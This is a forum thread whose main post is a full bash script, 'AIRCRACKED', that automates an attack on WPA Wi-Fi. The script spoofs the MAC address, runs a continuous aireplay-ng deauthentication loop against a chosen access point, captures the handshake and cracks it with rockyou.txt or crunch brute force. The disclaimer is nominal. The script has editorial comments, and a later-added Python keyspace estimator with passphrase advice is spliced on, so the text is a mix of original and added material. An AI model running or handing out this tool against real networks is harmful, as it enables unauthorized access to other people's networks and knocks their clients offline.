thisguysayswht

Posts posted by thisguysayswht

  1. We have seen instances where reaver provided the WPA key in the wrong case.

    For example, the key given by reaver for the WPA key was:

    john1234

    In fact the actual key was:

    JOHN1234

    Therefore if the key provided by reaver does not work, try altering the case. If altering the entire letter string does not work, try altering character by character.

    Example:

    JOHN1234

    jOHN1234

    JoHN1234

    etc. etc. etc.

    MTeams

    Interesting. This is only in certain cases (version of reaver, specific routers), correct?

    I ask because I've recovered a handful of passwords with reaver (the default version in bt5 r3), and I remember one in particular that was Passw0rd0590, and the case was correct in this instance.

    Do you mind me asking what version of reaver, and what kind of router gave you guys this result?

  2. This is my first (more than 5 line) bash script. If you have any suggestions/tips for improvement, I'm all ears. It's designed to run on Kali, but should be easily portable to other pentesting distros (or it might work right out of the box, idk, I haven't tested with anything else).

    What it does:

    1. Starts monitor mode on the interface of your choosing.

    2. Spoofs your MAC if you so desire.

    3. Runs airodump-ng.

    4. Prompts user for a BSSID/channel.

    5. Creates a ~/Handshakes folder in your home directory.

    6. Dumps the user-specified network traffic to the created ~/Handshakes folder.

    7. While dumping traffic, opens an xterm window that deauthenticates the previously specified AP.

    8. Asks the user if they would like to start again from step 3.

    9. Shuts down mon0, changes back to permanent MAC (if they want).

    10. Gives the user a number of options for attacking the handshake with aircrack-ng, these include:

    a) Running the pre-included rockyou.txt in Kali (automatically decompresses).

    b) A number of bruteforce attacks (7 predefined options).

    c) Allows the user to pass their own arguments to crunch.

    RAW code:

    #!/bin/bash
    
    clear
    echo ""
    
    #Configuration:
    
    HANDSHAKE='/root/Handshakes/HandShake*.cap'
    WORDLIST='/usr/share/wordlists/rockyou.txt'
    MONITER=mon0
    
    #End configuration
    
    echo "***************************************"
    echo "***********AIRCRACKED V-2.0************"
    echo "***************************************"
    echo "**                                   **"
    echo "**  Written by @thisguysayswht       **"
    echo "**  Email: hofmanjosh555@yahoo.com   **"
    echo "**                                   **"
    echo "**  Usage:                           **"
    echo "**                                   **"
    echo "**  Starts monitor interface         **"
    echo "**  Spoofs MAC address               **"
    echo "**  Runs airodump-ng                 **"
    echo "**  Creates Handshake directory      **"
    echo "**  Dumps specified network traffic  **"
    echo "**  Deauthenticates specified AP     **"
    echo "**  Captures handshake               **"
    echo "**  Restores wireless interfaces     **"
    echo "**  Runs aircrack-ng                 **"
    echo "**                                   **" 
    echo "***************************************"
    echo "***************************************"
    echo ""
    echo ""
    echo "========Press enter to continue========"
    read START
    if [[ $START == "" ]]; then
    sleep 2
    clear
    fi
    
    #Use at your own risk...
    
    echo "---------------------------------------------------"
    echo "-Would you like to start a monitor interface[y/n]?-"
    echo "---------------------------------------------------"
    echo ""
    read MONIF
    
    if [[ $MONIF == 'y' ]]; then
    echo ""
    iwconfig
    echo "Please select a wireless interface from above"
    echo ""
    read WIRELESS
    # The original bare test did nothing; abort if no interface was named
    [[ -z "$WIRELESS" ]] && { echo "No interface given, exiting."; exit 1; }
    sleep 2
    clear
    echo "Starting interface on $WIRELESS..."
    sleep 2
    airmon-ng start $WIRELESS
    sleep 4
    clear
    else
    echo ""
    echo "Skipping..."
    sleep 2
    clear
    fi
    
    echo "----------------------------------------"
    echo "-Would you like to spoof your MAC[y/n]?-"
    echo "----------------------------------------"
    echo ""
    read MACSPF
    
    if [[ $MACSPF == 'y' ]]; then
    echo ""
    echo "Shutting down all wireless interfaces..."
    echo ""
    sleep 2
    ifconfig $WIRELESS down
    ifconfig $MONITER down
    echo "Changing to random MAC..."
    echo ""
    sleep 2
    macchanger -r $WIRELESS 
    macchanger -r $MONITER
    echo ""
    echo "Bringing spoofed interfaces up..."
    echo ""
    sleep 4
    clear
    ifconfig $WIRELESS up
    ifconfig $MONITER up
    else
    echo ""
    echo "Skipping..."
    sleep 2
    clear
    fi
    
    while true
    do
    clear
    echo "--------------------------------------------------"
    echo "-Would you like to dump the network traffic[y/n]?-"
    echo "--------------------------------------------------"
    echo ""
    read DUMP
    if [[ $DUMP == 'y' ]]; then
    echo ""
    echo "Dumping network traffic...[Ctrl-C to stop]"
    sleep 4
    airodump-ng $MONITER
    else
    echo ""
    echo "Skipping..."
    sleep 2
    clear
    fi
    
    echo "---------------------------------------------"
    echo "-Would you like to capture a handshake[y/n]?-"
    echo "---------------------------------------------"
    echo ""
    read HANDC
    
    if [[ $HANDC == 'y' ]]; then
    echo ""
    echo "Creating directory Handshakes..."
    echo ""
    sleep 2
    cd ~
    mkdir Handshakes &> /dev/null
    echo ""
    echo "Please enter the network BSSID:"
    echo ""
    read BSSID
    # The original bare test did nothing; go back to the menu if nothing was entered
    [[ -z "$BSSID" ]] && { echo "No BSSID given."; sleep 2; continue; }
    echo ""
    echo "Please enter the network channel:"
    echo ""
    read CHNEL
    [[ -z "$CHNEL" ]] && { echo "No channel given."; sleep 2; continue; }
    airodump-ng --ig -w Handshakes/HandShake -c $CHNEL --bssid $BSSID $MONITER &
    sleep 6 &&
    xterm -hold -e "while true; do sleep 5; aireplay-ng -0 5 -q 2 --ig -a $BSSID $MONITER; done" &&
    exec -c
    clear
    else
    echo ""
    echo "Skipping..."
    sleep 2
    clear
    fi
    
    echo "---------------------------------------------------"
    echo "-Would you like to capture another handshake[y/n]?-"
    echo "---------------------------------------------------"
    echo ""
    read AGAIN
    
    # Lines after "break" were unreachable in the original and have been dropped
    if [[ $AGAIN == "n" ]]; then
    break
    fi
    
    done
    clear
    echo "-----------------------------------------------------------------------"
    echo "-Would you like to restore your previous interface configuration[y/n]?-"
    echo "-----------------------------------------------------------------------"
    echo ""
    read RESTOR
    
    if [[ $RESTOR == "y" ]]; then
    echo ""
    echo "Disabling monitor mode..."
    sleep 2
    airmon-ng stop $MONITER
    echo "Shutting down main wireless interface..."
    echo ""
    sleep 2
    ifconfig $WIRELESS down
    echo "Restoring permanent MAC..."
    echo ""
    sleep 2
    macchanger -p $WIRELESS
    echo ""
    echo "Bringing main wireless interface back up..."
    echo ""
    sleep 2
    ifconfig $WIRELESS up
    echo "Wireless interfaces restored"
    echo ""
    sleep 4
    clear
    else
    echo ""
    echo "Skipping..."
    sleep 2
    clear
    fi
    
    while true
    do
    clear
    echo "*****************************************************"
    echo "*******************Select option*********************"
    echo "*****************************************************"
    echo "**                                                 **"
    echo "** 1. View handshakes             (Ctrl-C to exit) **"
    echo "** 2. Use rockyou.txt             (4 hours)        **"
    echo "** 3. Bruteforce 8 numeric        (1 day 6 hrs)    **"
    echo "** 4. Bruteforce 9 numeric        (12 days)        **"
    echo "** 5. Bruteforce 10 numeric       (4 months)       **"
    echo "** 6. Bruteforce 8 a-z            (7 years)        **"
    echo "** 7. Bruteforce 8 A-Z            (7 years)        **"
    echo "** 8. Bruteforce 8 a-z + numeric  (91 years)       **"
    echo "** 9. Bruteforce 8 A-Z + numeric  (91 years)       **"
    echo "** 10. Bruteforce 8 a-z + A-Z     (1719 years)     **"
    echo "** 11. Bruteforce custom          (???)            **"
    echo "**                                                 **"
    echo "*****************************************************"
    echo "**********All calculations done @1000 pmk/s**********"
    echo "*****************************************************"
    echo ""
    
    read n
    case $n in
    1)(xterm -hold -e aircrack-ng $HANDSHAKE) & ;;
    
    2)clear
    echo "Decompressing rockyou.txt..."
    gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null
    echo ""
    sleep 2
    echo "Starting attack..."
    sleep 3
    aircrack-ng -w $WORDLIST $HANDSHAKE
    echo ""
    read -p "Press any key to return to script";;
    
    3)clear
    echo "Enter the BSSID of the network you wish to attack"
    echo ""
    read FKUAC
    [[ $FKUAC == "" ]]
    echo "Starting bruteforce 8 numeric"
    echo ""
    crunch 8 8 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE
    echo ""
    read -p "Press any key to return to script";;
    
    4)clear
    echo "Enter the BSSID of the network you wish to attack"
    echo ""
    read FKUAC
    [[ $FKUAC == "" ]]
    echo "Starting bruteforce 9 numeric"
    echo ""
    crunch 9 9 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE
    echo ""
    read -p "Press any key to return to script";;
    
    5)clear
    echo "Enter the BSSID of the network you wish to attack"
    echo ""
    read FKUAC
    [[ $FKUAC == "" ]]
    echo "Starting bruteforce 10 numeric"
    echo ""
    crunch 10 10 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE
    echo ""
    read -p "Press any key to return to script";;
    
    6)clear
    echo "Enter the BSSID of the network you wish to attack"
    echo ""
    read FKUAC
    [[ $FKUAC == "" ]]
    echo "Starting bruteforce 8 a-z"
    echo ""
    crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE
    echo ""
    read -p "Press any key to return to script";;
    
    7)clear
    echo "Enter the BSSID of the network you wish to attack"
    echo ""
    read FKUAC
    [[ $FKUAC == "" ]]
    echo "Starting bruteforce 8 A-Z"
    echo ""
    crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE
    echo ""
    read -p "Press any key to return to script";;
    
    8)clear
    echo "Enter the BSSID of the network you wish to attack"
    echo ""
    read FKUAC
    [[ $FKUAC == "" ]]
    echo "Starting bruteforce 8 a-z numeric"
    echo ""
    crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE
    echo ""
    read -p "Press any key to return to script";;
    
    9)clear
    echo "Enter the BSSID of the network you wish to attack"
    echo ""
    read FKUAC
    [[ $FKUAC == "" ]]
    echo "Starting bruteforce 8 A-Z numeric"
    echo ""
    crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE
    echo ""
    read -p "Press any key to return to script";;
    
    10)clear
    echo "Enter the BSSID of the network you wish to attack"
    echo ""
    read FKUAC
    [[ $FKUAC == "" ]]
    echo "Starting bruteforce 8 a-z A-Z"
    echo ""
    crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE
    echo ""
    read -p "Press any key to return to script";;
    
    11)clear
    echo "Enter the BSSID of the network you wish to attack"
    echo ""
    read FKUAC
    [[ $FKUAC == "" ]]
    echo "What arguments would you like to pass to crunch?"
    echo ""
    read CRUNCH
    [[ $CRUNCH == "" ]]
    echo ""
    echo "Starting custom bruteforce attack"
    echo ""
    crunch $CRUNCH|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE
    echo ""
    read -p "Press any key to return to script";;
    
    *)clear
    echo "Invalid option"
    echo ""
    read -p "Press any key to return to script";;
    
    esac
    sleep 1
    done
    

    Executable:

    Apparently it won't let me upload "this kind of file"; if anyone has a workaround let me know. For now just copy/paste into a text editor, save, and chmod +x /the/file in a terminal (or right click > Permissions > Allow executing of this file).

    Disclaimer:

    This code was written for educational purposes only.

    I am not responsible for what you do with this code.

    If this code sets your computer on fire, I am not responsible.

    If you use this code irresponsibly, and the FBI kicks your door down, I am not responsible.

    This code is designed to test the security of your router, and not anyone else's.

    If this code gets you laid, I might take responsibility.

    If you use this code, you are agreeing that it is at your own risk.
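The option menu in the script prices each brute-force charset at 1000 PMK/s (1 day 6 hrs, 12 days, 4 months, 7 years, 91 years, 1719 years). As an added example that is not part of the original post or the script, the following Python reproduces those estimates from the keyspace sizes that `crunch <min> <max> <alphabet>` enumerates, and adds one comparison row (a 12-character mixed-case alphanumeric passphrase, an assumption made here rather than a menu option) to show why only the short, single-class spaces the menu covers can ever be finished at that rate. `MENU`, `keyspace`, `humanize` and `estimate_table` are names chosen for this example.

```python
import string

# Alphabets exactly as the script's crunch invocations spell them out
DIGITS = string.digits            # 1234567890
LOWER = string.ascii_lowercase    # a-z
UPPER = string.ascii_uppercase    # A-Z

# Constructed table of the script's fixed-length menu options 3-10:
# (label, alphabet, length). The last row is a comparison added here;
# it is not an option in the script.
MENU = [
    ("8 numeric", DIGITS, 8),
    ("9 numeric", DIGITS, 9),
    ("10 numeric", DIGITS, 10),
    ("8 a-z", LOWER, 8),
    ("8 A-Z", UPPER, 8),
    ("8 a-z + numeric", LOWER + DIGITS, 8),
    ("8 A-Z + numeric", UPPER + DIGITS, 8),
    ("8 a-z + A-Z", LOWER + UPPER, 8),
    ("12 a-z + A-Z + numeric (comparison)", LOWER + UPPER + DIGITS, 12),
]

BANNER_RATE = 1000.0  # PMK/s, the rate the script's banner assumes


def keyspace(alphabet: str, min_len: int, max_len: int) -> int:
    """Candidates emitted by `crunch min_len max_len alphabet`:
    every string of each length in [min_len, max_len] over the alphabet."""
    size = len(alphabet)
    return sum(size ** n for n in range(min_len, max_len + 1))


def seconds_to_exhaust(candidates: int, rate_pmk_per_s: float) -> float:
    """Worst case: every candidate is tried. A correct guess lands half way
    through on average, so the expected time is half of this."""
    return candidates / rate_pmk_per_s


def humanize(seconds: float) -> str:
    """Express a duration in the largest unit that is >= 1, like the banner."""
    units = (
        ("years", 365 * 86400),
        ("months", 30 * 86400),
        ("days", 86400),
        ("hours", 3600),
        ("minutes", 60),
    )
    for name, size in units:
        if seconds >= size:
            return f"{seconds / size:.1f} {name}"
    return f"{seconds:.1f} seconds"


def estimate_table(rate: float = BANNER_RATE):
    """Return (label, candidates, worst-case seconds) for every MENU row."""
    rows = []
    for label, alphabet, length in MENU:
        n = keyspace(alphabet, length, length)
        rows.append((label, n, seconds_to_exhaust(n, rate)))
    return rows


if __name__ == "__main__":
    print(f"Worst-case time to exhaust each keyspace at {BANNER_RATE:.0f} PMK/s")
    for label, n, secs in estimate_table():
        print(f"{label:38} {n:>24,d} candidates  {humanize(secs):>14}")
```

Run it as a script to print the table. The worst-case figures match the banner to within rounding (8 digits is 10^8 / 1000 s, about 27.8 hours; 8 mixed-case letters is 52^8 / 1000 s, about 1695 years), and the expected time is half of each. The comparison row comes out at roughly 10^11 years at the same rate, which is the practical point for anyone reading this from the defending side: passphrase length and character-class mixing are what make an offline attack on a captured handshake infeasible, and the rate is the only parameter that changes with better hardware.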
